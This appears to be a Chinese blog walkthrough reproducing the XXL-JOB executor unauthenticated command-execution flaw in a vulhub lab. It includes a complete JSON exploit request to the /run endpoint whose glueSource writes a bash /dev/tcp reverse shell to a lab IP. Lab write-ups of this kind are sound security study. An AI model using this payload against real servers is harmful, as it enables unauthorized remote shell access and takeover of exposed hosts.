1、漏洞描述
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。
2、靶场搭建
靶场使用vulhub
进入vulhub/xxl-job/unacc目录下,执行docker-compose up -d
![在这里插入图片描述](https://img-blog.csdnimg.cn/759b2a3f64964736b26ea312fa3830c5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
容器起来后,docker ps -a
看一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/6df2bbb254d94fa8a79f3bdec2f843fd.png)
浏览器访问http://your-ip:9999
![在这里插入图片描述](https://img-blog.csdnimg.cn/a635374adcef4c369f0efed0e0245b74.png)
看到如上图,说明漏洞环境部署成功。
3、漏洞复现(反弹shell)
浏览器访问http://your-ip:9999/run,并通过bp抓包
![在这里插入图片描述](https://img-blog.csdnimg.cn/423babb832a7446ba9b5225702221739.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
修改请求方式为POST
,并写入exp,然后发送请求
exp:
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
![在这里插入图片描述](https://img-blog.csdnimg.cn/2446ad3885ed42e785224734b2b2d10e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
将/tmp/1.sh赋予可执行权限
![在这里插入图片描述](https://img-blog.csdnimg.cn/cdb6530efc3f44f2ae0afcf1b9acab14.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
开启nc监听
![在这里插入图片描述](https://img-blog.csdnimg.cn/194605a8ee004ac883b5f2ea1c11ff58.png)
执行命令:
![在这里插入图片描述](https://img-blog.csdnimg.cn/37dbc36f871c4ec3ba62742723032262.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
查看nc监听,反弹成功
![在这里插入图片描述](https://img-blog.csdnimg.cn/8aab1abc26cf43c5b17009d1ee34376a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16)